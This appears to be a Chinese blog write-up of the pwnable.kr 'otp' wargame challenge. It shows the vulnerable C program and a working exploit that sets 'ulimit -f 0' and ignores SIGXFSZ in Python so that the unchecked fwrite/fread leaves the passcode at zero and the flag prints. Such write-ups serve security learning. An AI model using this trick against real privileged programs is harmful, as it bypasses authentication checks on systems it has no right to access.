2. 程式人生 > >pwnable(otp)(open,read等函式的檢查缺失)

pwnable(otp)(open,read等函式的檢查缺失)

阿新 發佈:2018-12-12

遠端拷貝檔案到本地 scp -P 2222 [email protected]:/home/otp/opt .

學習到的函式strtoul(argv[1], 0, 16)str轉化位long,以16進位制方式。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

int main(int argc, char* argv[]){
	char fname[128];
	unsigned long long otp[2];

	if(argc!=2){
		printf("usage : ./otp [passcode]\n");
		return 0;
	}

	int fd = open("/dev/urandom", O_RDONLY);
	if(fd==-1) exit(-1);

	if(read(fd, otp, 16)!=16) exit(-1);
	close(fd);

	sprintf(fname, "/tmp/%llu", otp[0]);
	FILE* fp = fopen(fname, "w");
	if(fp==NULL){ exit(-1); }
	fwrite(&otp[1], 8, 1, fp);
	fclose(fp);

	printf("OTP generated.\n");

	unsigned long long passcode=0;
	FILE* fp2 = fopen(fname, "r");
	if(fp2==NULL){ exit(-1); }
	fread(&passcode, 8, 1, fp2);
	fclose(fp2);
	
	if(strtoul(argv[1], 0, 16) == passcode){
		printf("Congratz!\n");
		system("/bin/cat flag");
	}
	else{
		printf("OTP mismatch\n");
	}

	unlink(fname);
	return 0;
}

程式生成了一個隨機數放入檔案,然後讀取這個檔案然後讓這個檔案跟輸入的password進行比較相同獲取shell。

這裡可以觀察到fread(&passcode, 8, 1, fp2);是沒有驗證是否成功的,如果能夠開啟檔案成功但是讀取檔案中內容的時候失敗就能獲取shell。 接下來就是想辦法控制完成這一條件 可以用ulimit ulimit瞭解一下 在這裡可以設定檔案

[email protected]:~$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) 1500000
scheduling priority             (-e) 0
file size               (blocks, -f) 120000
pending signals                 (-i) 31753
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1500
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 300
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

 
[email protected]:~$ ulimit -f 0
[email protected]:~$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) 1500000
scheduling priority             (-e) 0
file size               (blocks, -f) 0
pending signals                 (-i) 31753
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1500
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 300
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

設定shell所能建立的最大檔案為0 但是這個時候執行的時候會報錯

[email protected]:~$ ./otp 0
File size limit exceeded

這個錯誤是作為訊號進行傳播的,linux系統中訊號是可以被忽略的

import signal
signal.signal(signal.SIGXFSZ,signal.SIG_IGN)

可以在python的互動視窗中獲取shell

>> import os,signal
>>> signal.signal(signal.SIGXFSZ,signal.SIG_IGN)
1
>>> os.system('./otp 0')
OTP generated.
Congratz!
Darn... I always forget to check the return value of fclose() :(
0

但是我們還可以直接用一條命令來輸出

ulimit -f 0 && python -c "import os,signal; signal.signal(signal.SIGXFSZ,signal.SIG_IGN); os.system('./otp 0')"

分析:設定ulimit -f 0使fwrite(&otp[1], 8, 1, fp);失敗,建立的檔案中資料寫入失敗讀取出來的就是0

相關推薦

pwnable(otp)(open,read函式檢查缺失)

遠端拷貝檔案到本地 scp -P 2222 [email protected]:/home/otp/opt . 學習到的函式strtoul(argv[1], 0, 16)str轉化位long,以16進位制方式。 #include <stdio.h

windows平臺下使用open,read函式易錯點及與fread區別

一般情況下,我們只在linux平臺下使用open,read等檔案I/O函式,《UNIX環境高階程式設計第二版》中介紹他們是POSIX.1標準的組成部分。 筆者偶然的機會將Linux下的程式移植到windows平臺下,卻發現這些函式同樣可以使用,但需要加入標頭檔案io.h ,

open/read/write/close檔案系統呼叫介面以及fd與FILE的比較

在Linux系統下,檔案是一個很重要的概念,接下來就介紹一下其相關的介面函式 一、熟悉open/read/write/close等檔案相關係統呼叫介面 1、open函式 註釋: (1)函式說明:用來開啟一個已經存在的檔案或者建立一個普通檔案 (

pandas isnull函式檢查資料是否有缺失

python pandas判斷缺失值一般採用 isnull(),生成的是所有資料的true/false矩陣 1,df.isnull()   元素級別的判斷,把對應的所有元素的位置都列出來,元素為空或者NA就顯示True,否則就是False 會產生如下結果 2,

Linux系統函數open,read,write

() lseek sed fse prot 地址 stdio.h buffer pri 實現代碼 #include<sys/stat.h> #include<sys/types.h> #include<fcntl.h> #include

通過建構函式檢查生成物件個數

程式碼為 1 package CheckObjectNumber; 2 3 public class CheckObjectNumber { 4 private static int num=0;//定義一個靜態成員num ,用於檢測執行建構函式的次數 5 public C

python中的open()函式

定義: python open() 函式用於開啟一個檔案,建立一個 file 物件,相關的方法才可以呼叫它進行讀寫 引數: 模式 描述 r 以只讀方式開啟檔案。檔案的指標將會放在檔案的開頭。這是預設模式。 rb 以

c++ 中cin get getline函式的使用規則

在學習C++的過程中,經常會遇到輸入輸出的問題,以下總結一下下面幾個函式的用法:  1)、cin  2)、cin.get()  3)、cin.getline()  4)、getline()  5)、gets() 1、cin>>&nbs

本週學習總結 第十週 C++中cin、cin.get()、cin.getline()、getline()、gets()函式的用法

   先總結幾個string字元陣列常用函式把 需要<string.h>標頭檔案才可以使用:  strlen(字元陣列) 、 strcpy(陣列1,陣列2)把2內容複製到1中去 、 strcat(陣列1,陣列2) 將2中內容連到1中去 、 strcmp(陣

split(), reverse(),join()函式用法

split()函式,join()函式: split函式是將一個字串分割成字串陣列。join函式是將陣列中的所有元素放入字串中。例如:比如我們有個字串"a",“b”,“c"我們要輸出為a,b,c這樣的格式,那麼我們可以這樣: var a = [“a”,“b”,“c”]; document.wr

fopen,fread,fclose,fgetc,fscanf,ftell函式的用法

目錄 fopen fread fclose fgetc fscanf ftell fwrite fseek 函式介紹 1.fopen FILE *fopen(const char *filename, const char *mod

IOS中正弦sin、cos函式運算的坑

在ios中可以完全相容c的函式,所以第一步要匯入 #include <math.h> 這樣就可以使用c的一系列函數了 c中有cos,sin,tan但是我們傳入度數後都得不到想到的結果,問題是: 我們傳入的是度數,而函式所需的引數是弧度,這裡就要我們做一個度--弧度的轉換

react onClick 函式傳參

不能使用(引數A, 引數B)的方式,而是要使用bind <Button onClick={this.showEdit.bind(this, 'add')}>新增使用者</Button>   showEdit = (type) => {   &nb

【python】詳解time模組功能asctime、localtime、mktime、sleep、strptime、strftime、time函式以及時間的加減運算

在Python中,與時間處理相關的模組有:time、datetime以及calendar。學會計算時間,對程式的調優非常重要,可以在程式中狂打時間戳,來具體判斷程式中哪一塊耗時最多,從而找到程式調優的重心處。這裡先來講一個time模組。 time模組所包含的函式能夠實現以下功能:獲取當前的時間、操作時間和日

一個函式檢查是否一個數字在兩人之間,在R

在R,我正在尋找一個函式,驗證如果號碼是另外兩個數之間。 我也需要控制(如果我想要一個嚴格的比較 我知道在dplyr()之間的函式。 然而,我必須知道上部和更低的數字。 MyNumber = 8First = 2Second = 10 This will return TRUE between(MyN

關於strlwr,strupr函式在此作用域中尚未宣告的問題

簡單題中遇到的問題!~~ 1423: String Task Time Limit: 1 Sec Memory Limit: 128 MB [Submit][Status][Web Board] Description Petya started to attend programm

泰勒展開式求sin(x)的值,程式實現,餘弦,正切函式類似

問題描述 用sin泰勒展式編寫程式,求出sin(π/2)和sin(56°)的值,精度要求達到小數點後6位(即當最後一項的絕對值小於0.00001時,累加結束,求絕對值的函式也可以自定義函式myabs實現)。 實際上,C語言的數學庫(#include<math.h>)中已經提供了

js判斷是否為Trident核心瀏覽器(IE)函式

//判斷是否為Trident核心瀏覽器(IE等)函式 browserIsIe: function () { if (!!window.ActiveXObject || "ActiveXObject" in window) { return true; }

Ubuntu 16.04 安裝fpocket2編譯找不到sqrt,exp函式

下載fpocket2 下載fpocket2下載 編譯 拷貝到你安裝目錄執行下面命令: [email protected]:~/cpf$ cp ~/Downloads/fpocket2.tar.

NX二次開發-UFUN特徵找xxx UF_MODL_ask_feat_xxx函式(待補充)

NX9+VS2012 #include <uf.h> #include <uf_modl.h> #include <uf_obj.h> #include <uf_ui.h> UF_initialize();